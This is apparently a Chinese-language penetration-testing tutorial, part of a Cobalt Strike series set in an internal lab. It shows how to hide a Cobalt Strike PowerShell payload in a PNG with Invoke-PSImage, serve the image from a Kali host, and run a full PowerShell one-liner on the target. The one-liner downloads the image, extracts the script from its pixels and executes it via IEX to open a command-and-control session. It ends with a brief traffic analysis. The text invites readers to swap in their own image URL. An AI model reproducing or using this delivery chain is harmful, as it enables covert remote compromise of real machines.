目录
【渗透测试】CS4.0的使用(四)
一、试验环境
kali:10.95.16.113
windows10:10.95.16.112 (无防护)
工具:Invoke-PSImage
https://github.com/peewpw/Invoke-PSImage
二、实验步骤
1、kali端本地启动cs4.3
kali端本地启动cs4.3的teamserver,客户端指定host为127.0.0.1启动(详情如下链接)
【渗透测试】CS4.0的使用(三).
2、创建监听
3、使用cs生成一个powershell的payload
生成文件
4、使用Invoke-PSImage生成shell图片
powershell.exe -exec bypass "Import-Module ./Invoke-PSImage.ps1;Invoke-PSImage -Script .\payload.ps1 -image .\test01.jpg -Out .\test02.png -Web"
【使用test01.jpg图片,生成test02.png图片shell】
5、将生成的图片上传到自己的服务器上
这里由于是内网实验环境,所以使用kali起了一个http服务模拟这个环节
python3 -m http.server 80
【这里GET是112执行了命令之后触发的】
6、在目标机器上执行攻击代码,cs上线
在112的powershell中执行以下命令
powershell sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://10.95.16.113/test02.png"));$o=a Byte[] 3840;(0..1)|%{foreach($x in(0..1919)){$p=$g.GetPixel($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3550]))
【其中http://10.95.16.113/test02.png部分修改成自己的图片网络地址】
成功上线
三、流量分析
说明: 执行了sal命令之后,目标机会先和服务器链接,然后和kali连接(实验中服务器和kali是同一台机器)
1、目标机器和服务器三次握手
2、请求test02.png图片
3、目标机和kali握手【通过444端口】
4、稳定连接